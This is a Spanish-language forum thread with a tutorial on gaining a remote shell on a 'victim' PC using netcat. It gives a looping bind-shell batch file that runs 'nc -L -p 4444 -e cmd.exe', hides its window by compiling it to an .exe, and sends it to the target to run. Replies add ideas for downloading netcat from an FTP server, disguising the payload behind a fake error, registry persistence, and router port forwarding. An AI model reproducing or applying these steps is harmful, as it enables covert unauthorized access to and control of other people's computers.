[Tutorial] Obtener SHELL remota con NETCAT

[DarkAngel]

Bueno, comienzo el manual de como obtener una SHELL con NETCAT =)
Comenzemos.

Bueno antes de comensar el archivo nc.exe despues mencionado tambien tiene que estar en la computadora de la "victima" preferente mente en el directorio
c:\WINDOWS\system32\
Mas adelante pondre algun modo de hacer esto automatico sin nesesidad de tanto problema.

Primero, antes que nada nos tenemos que bajar el NETCAT desde aca:


Para ver este enlace Registrate o Inicia Sesion

Lo descomprimimos



Y luego abrimos la carpeta donde se descomprmió.
Ahora copiamos el archivo llamado nc.exe a la carpeta

Código:

C:\WINDOWS\system32\

y listo.

Bueno, ahora para poder conectarnos a nuestra "victima" tenemos que mandarle este archivo .bat que es el

que contiene los comandos nesesarios para que una ves conectados a la ip de nuestra "victima"

En el archivo abre.bat se encuentra esto:

Código:

echo off
cls

:net
nc -L -p 4444 -e cmd.exe

goto net

Es un sencillo bat que lo que hace es ahí mismo es abierto dejar el puerto "4444" a la escucha para

cualquiera que quiera conectarse a esa IP y que se abra el cmd.exe y tengamos acceso a su SHELL.

Bueno, les explicare el mini code:

-L es para que se mantenga a la escucha asi se cierre la coneccion.
-p es para especificar el puerto por el cual conectarse
-e es para que cuando nos conectemos se abra tal cosa.

Pero un problema seria como mandarselo a mi victima sin que se le habra la ventanida negra y se de

cuenta =O. Pues bueno, lo que hares es convertirlo a .exe con el "Fast Exe-Batch Maker.exe" de Hendrix. se lo pueden bajar de aca


Para ver este enlace Registrate o Inicia Sesion
(si el link no funciona es que mi pc esta apagada)

Bueno, abrimos el Fast Exe maker y seleccionamos el .bat como ven aca.



Ahora hacemos click en la opcion MODO OCULTO y en compilar, y elegimos el nombre con el que queremos

guardar el .exe .



Bueno, yo cree el archivo con el nombre abre.exe =P
Listo, ahora ese archivo debemos de mandarselo a nuestra "victima", y solo haria falta que lo abra.

Ahora el siguiente paso es optener la IP de la victima, no voy a explicar eso a detalle debido a que en

el foro ya hay varios POSTS con esos temas asi que ponganse a buscar =P.

Bueno, suponiendo de que ya tenemos la IP , es hora de la accion =)

Vamos a INICO>EJECUTAR>y escribimos "cmd" sin comillas obiamente como lo ven en esta imagen



NOs aparecera una ventanita negra como esta.



Ahora, vamos a ingresar el siguiente code:

nc [IP] [PUERTO]
(asi de simple)

en mi caso seria

nc 192.168.1.34 4444

el "192.168.1.34" es la IP de mi victima y el "4444" es el puerto al que esta a la escucha.
Apretamos ENTER y si todo va bien nos aparecera esto:



Eso significa que hicimos todo bien!!!
ahora tenemos la shell de nuestra victima y es como si estuvieramos en su computadora =p.

si nos queremos desconectar simplemente ponemos ctrl+c o cerramos la ventana y listo.



espero comentarios, sugerencias y dudas =P
salu2

..<<<By DarkAngel>>>...

[Crashing]

Y para q deje de escuchar solo hay que borrar el .bat?

[DarkAngel]

pues para que deje de escuchar pon ctrl+alt+del y finaliza la tarea nc.exe y/o cmd.exe

[loky89]

tengo una duda, dices que más adelante explicarás como hacer eso sin tanto problema se puede hacer un bat en un .zip junto con el nc.exe y hacer que al descomprimirlo lo envie automaticament e al directorio que ya especificaste?

[DarkAngel]

pues no se como se podria hacer para descomprimir un archivo pero si se podria que hacer que el nc.exe se abra y se copie solito y luego se ejecuten los comandos y etc.
Estaba pensando en que se baje de un ftp a la pc de la "victima" y luego se copie solo y toda la cosa. El problema es que por ahora no dispongo de mucho tiempo libre y no me alcansaria para hacer el manual con imagenes y todo  como quiero hacerlo. =P

[McWit0]

eso mismo que intentas hacer ya lo postee yo hace tiempo en otro hilo, mi codigo lo que hace es al ser ejecutado verifica si existe el netcat, sino existe lo baja de mi ftp y lo pone a la escuxa, y si existe lo pone a la escuxa, si leyeras mas te darias cuenta que ya esta posteado.

[Salteño]

Holas...!!! Gracias por la info, kisiera saber si esto se puede hacer si la otra persona no tiene el netcat, y si se puede hacer por ej. si la victima tiene un puerto escuchando por ej. el de msn y esta activado la camara tiene un puerto a la escucha entrando al netcat y poniendolo a la escucha ese puerto se puede entrar a la maquina del otro....

Salu2

[nomadanatasha]

El link que pusiste para mandar netcat esta dañado y no lo encuentro por ningun lado.. podrias poner otro o mandarmelo porfa! ,.. saludos....

[nomadanatasha]

Me es Imposible conseguir netcat 1.11 caballeros... porfavor ayudenme... mandenmelo o algo.. 

[DarkAngel]

bajalo de su web... ubieses buscado en google antes...


Para ver este enlace Registrate o Inicia Sesion

[Spiff]

oye no he encontrado el Fast_Exe_Batch _Make no tendras un link por ahi verdad ?
es que el link ese no furula

[dante189]

echo off
cls

:net
nc -L -p 4444 -e cmd.exe

goto net


ese codigo esta mal, no funciona. lo ke estas haciedo es un bucle infinito nunca termina

[matrix_hc85]

por  esta mal? si lo k hace seria poner a la escucha siempre ese puerto. no tendria k estar mal eso

[koopa2]

hola , yo tengo por ahi en mi pc , un programita que hice en bath que despues lo gunte junto con el netcat , lo hice .exe con el iexpress de windows. lo que hacia era cuando la victima lo ejecutaba te tiraba un error de memoria que no poued ejecutar ese programa y copiaba el netcat a c:\windows\system32 y tambien lo agregaba en el registro para que se abra una shell remota cada ves que encendia la pc.un dia de estos lo subo al foro xD

pero tengo un problema o sea se lo envie a una perosno y funione boen peo a la hora de conectarme no conecta , es una shell directa. cuando fui a la casa y use su pc , vi ue no tiene firewall sol oel de windows , ahi el abri el puerto pero no funciona :S , no se si tengo que entrar en su router y abilitar el puerto por ahi , alguna idea???

saludos

[0brint Pas]

si tengo que entrar en su router y abilitar el puerto por ahi , alguna idea???

saludos

eso mismo. ojo, puede que ni asi funcione, pero deberia.

por  esta mal? si lo k hace seria poner a la escucha siempre ese puerto. no tendria k estar mal eso

Esta mal. No ves que un bucle infinito lo que haria seria ejecutar nc infinitamente? Sabes que significa? Que como es dentro de la ejecucion misma del programa, para ejecutar uno no cierra el otro, con lo que se acumulan en la RAM, provocando un desbordamiento de búffer, o de la RAM y por tanto que el programa no responda, cerrando tu querido puerto. Por lo menos deberia, por eso es tan negativo usar bucles infinitos.